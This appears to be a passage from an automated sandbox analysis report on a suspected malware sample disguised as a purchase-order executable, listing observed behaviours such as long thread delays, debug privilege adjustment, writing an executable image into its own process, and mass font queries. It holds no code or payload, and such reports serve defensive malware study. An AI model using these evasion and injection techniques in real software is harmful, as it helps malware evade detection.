            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596169Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595835Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595623Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeWindow / User API: threadDelayed 8494Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeWindow / User API: threadDelayed 1357Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7636Thread sleep count: 8494 > 30Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7636Thread sleep count: 1357 > 30Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599217s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596169s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595835s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595623s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -594938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exe TID: 7632Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596169Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595835Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595623Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeThread delayed: delay time: 594469Jump to behavior
            Source: 109__Purchase_Order.exe, 00000002.00000002.4074924929.00000000013D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*"8
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeMemory written: C:\Users\user\Desktop\109__Purchase_Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeProcess created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Users\user\Desktop\109__Purchase_Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
